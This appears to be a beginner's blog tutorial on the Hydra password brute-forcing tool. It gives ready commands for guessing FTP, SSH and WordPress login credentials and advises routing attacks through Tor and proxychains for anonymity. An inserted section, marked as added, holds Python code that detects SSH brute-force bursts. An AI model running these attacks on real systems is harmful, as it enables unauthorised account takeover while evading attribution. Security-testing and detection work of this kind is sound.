Using Hydra To Brute Force Different Services!
First, you might wonder what THC is: it stands for The Hacker’s Choice, and it really is a gem.
This is my first write-up so please forgive my mistakes.
THC-Hydra is a brute-force cracking tool that supports many protocols, such as HTTP, HTTPS, SSH, Telnet, LDAP, FTP and many more.
Disclaimer AND Credits To the Developer-
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak — Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). And cracking Instagram!!, As well as Facebook!! Accounts.
Downloading Hydra In Kali Linux-
You can always find the newest release/production version of hydra at its project page at
https://github.com/vanhauser-thc/thc-hydra/releases
Or GIT Clone it to your Attacker Machine.
HOW TO COMPILE
To configure, compile and install hydra, just type:
./configure
make
make install
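Hydra's optional modules are only built if their libraries are present when ./configure runs, so install all the supplementary libraries as well: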
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
firebird-dev libmemcached-dev libgpg-error-dev \
libgcrypt11-dev libgcrypt20-dev
Check the usage of Hydra with the command below:
#hydra -h
Hydra works best if you use it with a dictionary such as SecLists, or make your own with Crunch.
Installing SecLists
Zip
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip
Git (Small)
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
Git (Complete)
git clone https://github.com/danielmiessler/SecLists.git
Kali Linux
apt -y install seclists
Some Examples, Because They Help So Much
1) Brute_F0rcing FTP service
#hydra -L <username_file> -P <password_file> ftp://<Target_IP>
#hydra -l <username> -p <password> ftp://<Target_IP>
#hydra -V -L /root/user.lst -P /root/pass.lst -t 18 10.10.10.10 ftp
- -t TASKS: number of tasks to run in parallel (default is 16)
- -V: Verbose
Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the “-6” command line option. All attacks are then IPv6 only!
If you want to supply your targets via a text file, you cannot use the :// notation. List one target per line, optionally with a port:
foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121
Note that if you want to attack IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:
foo.bar.com
target.com:21
[fe80::1%eth0]
[2001::1]
[2002::2]:8080
[2a01:24a:133:0:00:123:ff:1a]
2) Brute_F0rcing SSH Service
#hydra -L users.txt -P /usr/share/wordlist/rockyou.txt 10.10.10.1 ssh
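The defender's view of the SSH run above, as an added example (not part of the original write-up or of Hydra): parallel guessing leaves a burst of sshd "Failed password" lines from one source, and this Python code flags such bursts. The log lines are constructed, and the RFC 3339 timestamp prefix, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd failure line; the RFC 3339 timestamp prefix is an assumption.
FAILED = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample: 192.0.2.10 guesses in parallel, 198.51.100.7 is a
# user who mistypes twice, minutes apart, then logs in.
SAMPLE = """\
2024-03-10T12:00:01+00:00 srv sshd[801]: Failed password for root from 192.0.2.10 port 40001 ssh2
2024-03-10T12:00:01+00:00 srv sshd[802]: Failed password for invalid user admin from 192.0.2.10 port 40002 ssh2
2024-03-10T12:00:02+00:00 srv sshd[803]: Failed password for invalid user test from 192.0.2.10 port 40003 ssh2
2024-03-10T12:00:02+00:00 srv sshd[790]: Failed password for alice from 198.51.100.7 port 51514 ssh2
2024-03-10T12:00:03+00:00 srv sshd[804]: Failed password for root from 192.0.2.10 port 40004 ssh2
2024-03-10T12:00:04+00:00 srv sshd[805]: Failed password for root from 192.0.2.10 port 40005 ssh2
2024-03-10T12:04:30+00:00 srv sshd[811]: Failed password for alice from 198.51.100.7 port 51530 ssh2
2024-03-10T12:04:41+00:00 srv sshd[811]: Accepted password for alice from 198.51.100.7 port 51530 ssh2
""".splitlines()


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {source_ip: usernames tried} for sources with at least
    `threshold` failed logins inside one sliding window."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # ip -> failure times still in the window
    users = defaultdict(set)     # ip -> every username that failed
    flagged = set()
    for line in lines:           # lines are assumed to be in time order
        m = FAILED.match(line)
        if not m:
            continue  # accepted logins and unrelated lines
        ts, ip = datetime.fromisoformat(m["ts"]), m["ip"]
        users[ip].add(m["user"])
        times = recent[ip]
        times.append(ts)
        while ts - times[0] > window:
            times.popleft()  # drop failures older than the window
        if len(times) >= threshold:
            flagged.add(ip)
    return {ip: sorted(users[ip]) for ip in flagged}


if __name__ == "__main__":
    for ip, names in detect_bruteforce(SAMPLE).items():
        print(f"{ip}: burst of failed logins for {', '.join(names)}")
```

Tools such as fail2ban apply the same per-source counting to the live log and block the address once the threshold is reached.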
3) Resuming the brute f0rce attack
#hydra -L users.txt -P /usr/share/wordlist/rockyou.txt 10.1.1.1 ssh
#hydra -R
4) Saving 0utput In a File
#hydra -l admin -P pass.txt 10.10.10.10 ssh -o result.txt
5) A layer of an0nymity
A drawback of every other tool is that it generates too much noise. A better option is to use Hydra with proxychains and Tor.
apt-get install proxychains
apt-get install tor
service tor status   # check the Tor status after installation
Editing Proxy chains:
nano /etc/proxychains.conf
Let's start the attack using Tor:
proxychains hydra -l admin -P rockyou.txt 10.10.1.1 ssh
6) Specific p0rt Instead 0f default P0rt
#hydra -l admin -P /usr/share/wordlist/rockyou.txt -s 2525 1.1.1.1 ftp
7) Brute forcing L0gin Forms
Firstly, we need to find a login form and work out what type of request the form makes to the web server. Mostly this is a GET or a POST request.
We can check what type of request a form makes by looking at the page source or by identifying the request in the Burp proxy.
Secondly, we need to specify the variables of the GET/POST request, with “^USER^” and “^PASS^” marking where the varying usernames and passwords go.
Third comes the string that checks for a valid or invalid login. By default it marks an invalid login, and any response without it is counted as a success; prefixed with S=, as in the command below, it marks a successful login instead. The arguments are separated by ‘:’.
Use the Burp proxy to get the variables, because the request is neat and clean in Burp and it is easy peasy as well.
hydra -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Conclusion:
Hydra is a great tool that can be used to crack different services by brute forcing, in an easy way and with great impact. But use it for legal purposes only: with a great tool comes great responsibility as well.
Thanks For Reading
Author- Harsh Dushyant Singh